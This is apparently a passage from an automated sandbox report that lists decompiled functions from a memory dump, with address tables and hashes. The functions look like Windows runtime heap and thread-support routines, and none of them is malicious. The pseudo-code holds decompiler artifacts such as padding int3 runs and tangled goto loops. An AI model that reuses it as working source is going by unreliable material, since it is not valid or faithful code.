				_t37 = __ecx;
				E1E4341E8(__ebx, __edi, __ecx, _t39);
				E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x1e4987e4;
					_t18 =  *0x1e4987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1e495cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x1e4987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x1e4987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L1E3A7055(_t31 + 0xfffffff8);
								_t24 =  *0x1e4987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x1e4987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1e495cd0;
				if( *0x1e495cd0 <= 0) {
					L1E3A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x1e4987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x1e4987e8 = _t30;
						 *0x1e4987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E1E3FD0D1(L1E434320());
			}

0x1e434257
0x1e434257
0x1e434257
0x1e434259
0x1e43425e
0x1e434263
0x1e434265
0x1e434273
0x1e434278
0x1e43427c
0x1e43427f
0x1e434281
0x1e434287
0x1e4342d7
0x1e4342d7
0x1e4342da
0x1e43428d
0x1e43428d
0x1e43428f
0x1e434292
0x1e434297
0x1e43429c
0x1e4342a0
0x1e4342a6
0x1e4342a8
0x1e4342ae
0x1e4342b3
0x00000000
0x1e4342ba
0x1e4342ba
0x1e4342bf
0x1e4342c5
0x1e4342ca
0x1e4342cf
0x1e4342d0
0x00000000
0x1e4342d0
0x1e4342b3
0x00000000
0x1e4342a6
0x1e43429c
0x1e4342dc
0x1e4342dc
0x1e4342e3
0x1e434309
0x1e4342e5
0x1e4342e5
0x1e4342e8
0x1e4342ee
0x1e4342f0
0x00000000
0x1e4342f2
0x1e4342f2
0x1e4342f4
0x1e4342f7
0x1e4342f9
0x1e434300
0x1e434300
0x1e4342f0
0x1e43430e
0x1e43431f

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87120aeae4d37979a0f9334b4ce81992883480f778e142dd82c7acdf96382d1e
Instruction ID: 2db62ea1030cd10fcff36a8761c7733b801aa93c9794e7ba443b45b70908ef15
Opcode Fuzzy Hash: 87120aeae4d37979a0f9334b4ce81992883480f778e142dd82c7acdf96382d1e
Instruction Fuzzy Hash: CA217C78500661CFD319CF68D488688F7A1FB9E356B6087ABC115EB3A5DB31E481CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1E4246A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1E4246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E1E3EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E1E3DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L1E3C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x1e4246b7
0x1e4246ba
0x1e4246c5
0x1e4246c8
0x1e4246d0
0x1e4246d4
0x1e4246e6
0x1e4246e9
0x1e4246f4
0x1e4246ff
0x1e424705
0x1e424706
0x1e42470c
0x1e424713
0x1e42471b
0x1e424723
0x1e424725
0x1e4246d6
0x1e4246d9
0x1e4246db
0x1e4246db
0x1e424732

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 093e7c16ce3f92b45f195e7abca080dc39b0e46ff1163f54edb4043e64f3f5eb
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 7D11E576504248BBC7058F6DE8808BEB7B9EF95304F10816AF984CB350DB359D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1E3D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x1e49848c != 0) {
					L1E3CFAD0(0x1e498610);
					if( *0x1e49848c == 0) {
						E1E3CFA00(0x1e498610, _t19, _t27, 0x1e498610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E1E3D2581(0x1e498610, 0x1e3850a0, _t26, _t27, _t28);
						E1E3CFA00(0x1e498610, 0x1e3850a0, _t27, 0x1e498610);
					}
				} else {
					L1:
					_t11 =  *0x1e498614; // 0x1
					if(_t11 == 0) {
						_t11 = E1E3E4886(0x1e381088, 1, 0x1e498614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E1E3D2581(0x1e498610, (_t11 << 4) + 0x1e385070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x1e3d23b0
0x1e3d23b6
0x1e3d2409
0x1e3d2415
0x1e415ae9
0x00000000
0x1e3d241b
0x1e3d241b
0x1e3d241d
0x1e3d2427
0x1e3d242e
0x1e3d2430
0x1e3d2430
0x1e3d23b8
0x1e3d23b8
0x1e3d23b8
0x1e3d23bf
0x1e3d23fc
0x1e3d23fc
0x1e3d23c1
0x1e3d23c3
0x1e3d23d0
0x1e3d23d8
0x1e3d23d8
0x1e3d23dc
0x1e3d23de
0x1e3d23e1
0x1e3d23e1
0x1e3d23ec

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c535c463944ea74ed56a1ce917aea4403dad383f9649f0866c4c32592b4bbc
Instruction ID: 11d72a8084d5744602ba8eaed7c61c9568d02599caf464b7d7c340791a8a2a73
Opcode Fuzzy Hash: 82c535c463944ea74ed56a1ce917aea4403dad383f9649f0866c4c32592b4bbc
Instruction Fuzzy Hash: AE110877644390ABE720862BAC90F19F6DDFB98A20F944756F502AB280D770EC488654

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1E3E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E1E3C2280(_t6, 0x1e498550);
				}
				_t29 = E1E3E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E1E3BFFB0(0x1e498550, _t27, 0x1e498550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x1e3e37fa
0x1e3e37fc
0x1e3e3805
0x1e3e3808
0x1e3e3808
0x1e3e3814
0x1e3e3818
0x1e3e3846
0x1e3e3848
0x1e3e384b
0x1e3e384b
0x1e3e3852
0x00000000
0x1e3e3854
0x1e3e3856
0x00000000
0x00000000
0x1e3e3863
0x00000000
0x1e3e3863
0x1e3e381a
0x1e3e381a
0x1e3e381f
0x1e3e386e
0x1e3e386e
0x1e3e3871
0x1e3e3873
0x1e3e3873
0x1e3e3868
0x00000000
0x1e3e3868
0x1e3e3821
0x1e3e3826
0x00000000
0x00000000
0x1e3e3828
0x1e3e382a
0x1e3e3841
0x00000000
0x1e3e3841

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894a7e855d46020970e121be48c177cfa3b480ea34f117fca9a2d0f34dcaf48b
Instruction ID: c803053969608016e5cf6263538fe5c48e104e041769c5e2ac5247c105daf6a3
Opcode Fuzzy Hash: 894a7e855d46020970e121be48c177cfa3b480ea34f117fca9a2d0f34dcaf48b
Instruction Fuzzy Hash: CE01D6729416B19BC3278B1ED940E3EBBA7DFC5B60715476AE849CBA15DB30D805C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1E3D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E1E3C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E1E3C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E1E3C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E1E3C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x1e3d0032
0x1e3d0037
0x1e3d0043
0x1e414b3a
0x1e3d0049
0x1e3d0049
0x1e3d0049
0x1e3d004e
0x1e3d0053
0x1e414b48
0x1e414b5a
0x1e414b4a
0x1e414b53
0x1e414b53
0x1e414b5f
0x00000000
0x1e414b61
0x00000000
0x1e414b61
0x1e3d0059
0x1e3d0059
0x1e3d0060
0x1e414b6f
0x1e414b6f
0x1e3d0069
0x1e414b83
0x00000000
0x00000000
0x1e414b90
0x1e414b9b
0x1e414b9b
0x1e414ba4
0x00000000
0x00000000
0x1e414baa
0x00000000
0x1e3d006f
0x1e3d006f
0x00000000
0x1e3d006f
0x1e3d0069

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 1c1088823b1469000015856d13c27868735b9e3a0e736a5b3fd492a1cc01e32b
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 3011E1726117C19FD7028735C958B15B7EBBB40B98F0902E2DD04CF792D328E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1E3B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E1E3DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E1E3DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L1E3C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x1e3b7672
0x1e3b767f
0x1e3b7689
0x1e3b76de
0x1e3b76de
0x1e3b768b
0x1e3b7691
0x1e3b7693
0x1e3b7697
0x00000000
0x1e3b7699
0x1e3b76a8
0x00000000
0x1e3b76aa
0x1e3b76ad
0x1e3b76b1
0x00000000
0x1e3b76b3
0x1e3b76b3
0x1e3b76b5
0x1e3b76ba
0x1e3b76bc
0x1e3b76bc
0x1e3b76c0
0x00000000
0x1e3b76c2
0x1e3b76ce
0x1e3b76ce
0x1e3b76c0
0x1e3b76b1
0x1e3b76a8
0x1e3b7697
0x1e3b76d9

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 7d4ee52036fbaa892489b44dbd0323569e7843618b9b7248c5c46473b7d05960
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 3B018432710219AFD7218E5ECC55F5B77ADEF84660B2A0724B909DB654DA70DD0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 1E43C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1E43C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E1E3E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E1E3E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E1E3E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E1E3E95D0();
				return L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x1e43c458
0x1e43c45d
0x1e43c466
0x1e43c468
0x1e43c469
0x1e43c46a
0x1e43c46b
0x1e43c46e
0x1e43c46f
0x1e43c471
0x1e43c476
0x1e43c476
0x1e43c47c
0x1e43c47e
0x1e43c480
0x1e43c480
0x1e43c483
0x1e43c484
0x1e43c486
0x1e43c488
0x1e43c48f
0x1e43c491
0x1e43c493
0x1e43c493
0x1e43c48f
0x1e43c498
0x1e43c49e
0x1e43c4ad
0x1e43c4ad
0x1e43c4b2
0x1e43c4b4
0x1e43c4cd

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 2e8401a641638323de3509078c6776265d907b2f51ebca06e6e8da3a2d3c1e4b
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 9E01C0B6140659BFD6119F26CC80E62B77EFB58391F104A26F11442AA0CB22FCA1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1E3A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x1e4985ec;
				E1E3C2280(_t48, 0x1e4985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E1E3BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x1e49538c; // 0x779948
					if( *_t84 != 0x1e495388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x1e47f6e8);
						E1E3FD0E8(0x1e4985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E1E4788F5(_t80, _t85, 0x1e495388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x1e4986c0; // 0x7007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x1e4986b8;
								if(_t99 ==  *0x1e4986b8) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E1E3C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E1E4788F5(0x1e4985ec, _t85, 0x1e495388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E1E3EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x1e49b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x1e4984c0;
																			if(_t82 >=  *0x1e4984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E1E479063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E1E3A922A(_t99);
										_t64 = E1E3C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E1E478B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x1e4986c0; // 0x7007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x1e4986b8;
												if(__eflags == 0) {
													_t94 = 0x1e4986bc;
													_t87 = 0x1e4986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E1E3A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x1e4986c4;
												_t87 = 0x1e4986c0;
												L27:
												E1E3D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E1E3FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1e495388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x1e49538c = _t51;
						goto L6;
					}
				}
			}

0x1e3a9082
0x1e3a9083
0x1e3a9084
0x1e3a9085
0x1e3a9087
0x1e3a9096
0x1e3a9098
0x1e3a9098
0x1e3a909e
0x1e3a90a8
0x1e3a90e7
0x1e3a90e7
0x1e3a90aa
0x1e3a90b0
0x1e3a90b7
0x1e3a90bd
0x1e3a90dd
0x1e3a90e6
0x1e3a90bf
0x1e3a90bf
0x1e3a90c7
0x1e3a90cf
0x1e3a90f1
0x1e3a90f2
0x1e3a90f4
0x1e3a90f5
0x1e3a90f6
0x1e3a90f7
0x1e3a90f8
0x1e3a90f9
0x1e3a90fa
0x1e3a90fb
0x1e3a90fc
0x1e3a90fd
0x1e3a90fe
0x1e3a90ff
0x1e3a9100
0x1e3a9102
0x1e3a9107
0x1e3a910c
0x1e3a9110
0x1e3a9113
0x1e3a9115
0x1e3a9136
0x1e3a913f
0x1e3a9143
0x1e4037e4
0x1e4037e4
0x1e3a9117
0x1e3a9117
0x1e3a911d
0x00000000
0x1e3a911f
0x1e3a911f
0x1e3a9125
0x00000000
0x1e3a9127
0x1e3a912d
0x1e3a9130
0x1e3a9134
0x1e3a9158
0x1e3a915d
0x1e3a9161
0x1e3a9168
0x1e403715
0x1e3a916e
0x1e3a916e
0x1e3a9175
0x1e3a9177
0x1e3a917e
0x1e3a917f
0x1e3a9182
0x1e3a9182
0x1e3a9187
0x1e3a9187
0x1e3a918a
0x1e3a918d
0x1e3a918f
0x1e3a9192
0x1e3a9195
0x1e3a9198
0x1e3a9198
0x1e3a9198
0x1e3a919a
0x00000000
0x00000000
0x1e40371f
0x1e403721
0x1e403727
0x1e40372f
0x1e403733
0x1e403735
0x1e403738
0x1e40373b
0x1e40373d
0x1e403740
0x00000000
0x1e403746
0x1e403746
0x1e403749
0x00000000
0x1e40374f
0x1e40374f
0x1e403751
0x1e403757
0x1e403759
0x1e40375c
0x1e40375c
0x1e40375e
0x1e40375e
0x1e403761
0x1e403764
0x00000000
0x00000000
0x1e403766
0x1e403768
0x1e4037a3
0x1e4037a3
0x1e4037a5
0x1e4037a7
0x1e4037ad
0x1e4037b0
0x1e4037b2
0x1e4037bc
0x1e4037c2
0x1e4037c2
0x1e4037b2
0x1e3a9187
0x1e3a9187
0x1e3a918a
0x1e3a918d
0x1e3a918f
0x1e3a9192
0x1e3a9195
0x00000000
0x1e3a9195
0x00000000
0x1e40376a
0x1e40376a
0x1e40376a
0x1e40376c
0x1e40376c
0x1e40376f
0x1e403775
0x00000000
0x00000000
0x1e403777
0x1e403779
0x1e403782
0x1e403787
0x1e403789
0x1e403790
0x1e403790
0x1e40378b
0x1e40378b
0x1e40378b
0x1e403792
0x1e403795
0x00000000
0x1e403795
0x00000000
0x1e403779
0x1e403798
0x00000000
0x1e403798
0x00000000
0x1e403768
0x1e40379b
0x1e40379b
0x1e403751
0x1e403749
0x00000000
0x1e403740
0x1e3a91a0
0x1e3a91a3
0x1e3a91a9
0x1e3a91b0
0x00000000
0x1e3a91b0
0x1e3a9187
0x1e3a91b4
0x1e3a91b4
0x1e3a91bb
0x1e3a91c0
0x1e3a91c5
0x1e3a91c7
0x1e4037da
0x1e3a91cd
0x1e3a91cd
0x1e3a91cd
0x1e3a91d2
0x1e3a91d5
0x1e3a9239
0x1e3a9239
0x1e3a91d7
0x1e3a91db
0x1e3a91e1
0x1e3a91e7
0x1e3a91fd
0x1e3a9203
0x1e3a921e
0x1e3a9223
0x00000000
0x1e3a9205
0x1e3a9205
0x1e3a9208
0x1e3a920c
0x1e3a9214
0x1e3a9214
0x1e3a920c
0x1e3a91e9
0x1e3a91e9
